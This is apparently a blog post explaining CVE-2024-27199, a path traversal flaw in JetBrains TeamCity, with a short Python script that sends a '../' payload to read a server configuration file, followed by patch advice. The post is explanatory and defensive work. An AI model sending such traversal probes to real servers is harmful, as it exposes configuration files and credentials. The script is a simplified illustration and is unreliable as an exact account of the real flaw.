CVE-2024-27199 - Path Traversal in JetBrains TeamCity Before 2023.11.4 Lets Attackers Do Limited Admin Actions

If you use JetBrains TeamCity, you know it’s a powerful system for Continuous Integration and Continuous Deployment (CI/CD). TeamCity is used by thousands of organizations for automating builds, tests, and deployments. But sometimes, a small bug can become a massive headache—just like the vulnerability CVE-2024-27199.

In this post, I’ll break down what CVE-2024-27199 is, how it happens, link you to official references, and show a simple code snippet to understand the danger.

What Is CVE-2024-27199?

CVE-2024-27199 is a path traversal vulnerability found in JetBrains TeamCity servers prior to version 2023.11.4. In simple words, an attacker could trick the server into letting them access or change files and resources outside the intended directory. This allowed unauthorized users to perform some limited administrator actions without proper credentials.

How Did the Vulnerability Work?

Path traversal is a trick where an attacker adds ../ in a URL or file path so they can “move up” directories and access restricted files or resources.

Suppose a server allows you to view this URL

https://teamcity.example.com/admin/edit.html?file=config.xml

What if an attacker changes file=config.xml to file=../../../../teamcity-server-log.xml? Suddenly, they might access files the admin never meant for them to see!

Exploit Snippet: TeamCity Path Traversal

Let’s look at a basic Python code that demonstrates how a bad actor might test a vulnerable TeamCity server:

import requests

# Replace with your TeamCity server URL
url = 'https://teamcity.example.com/app/rest/projects';

# Craft a malicious path to read a sensitive file
payload = '../../../../conf/server.xml'

# Send the request (endpoint may vary)
resp = requests.get(
    f'{url}/{payload}',
    headers={'Accept': 'application/xml'}
)

if resp.status_code == 200:
    print("Vulnerability exists! Sensitive info:")
    print(resp.text[:500])  # Print first 500 chars
else:
    print("Maybe patched or not vulnerable.")

Note: The above code is provided for educational purposes—to verify your own systems! Don’t use it on any system you don’t own/operate.

What Could an Attacker Do?

- View sensitive admin/configuration files

Pivot to further attacks by getting credentials or secrets

The access is “limited” because this flaw doesn’t give full system control, but it’s more than enough to be dangerous.

Official References and Patches

- JetBrains Security Bulletin
- NVD Entry for CVE-2024-27199
- GitHub Advisory

JetBrains strongly recommends updating TeamCity to version 2023.11.4 or newer.

Wrapping Up

CVE-2024-27199 is a good example of how a little mistake can become a big risk in critical infrastructure like TeamCity. Don’t wait until an attacker finds you. Patch your servers, restrict access, and stay up to date on security bulletins.

If you want to dig deeper:
- TeamCity 2023.11.4 Critical Security Update
- CVE-2024-27199 NIST Entry

Timeline

Published on: 03/04/2024 18:15:09 UTC
Last modified on: 03/11/2024 15:15:47 UTC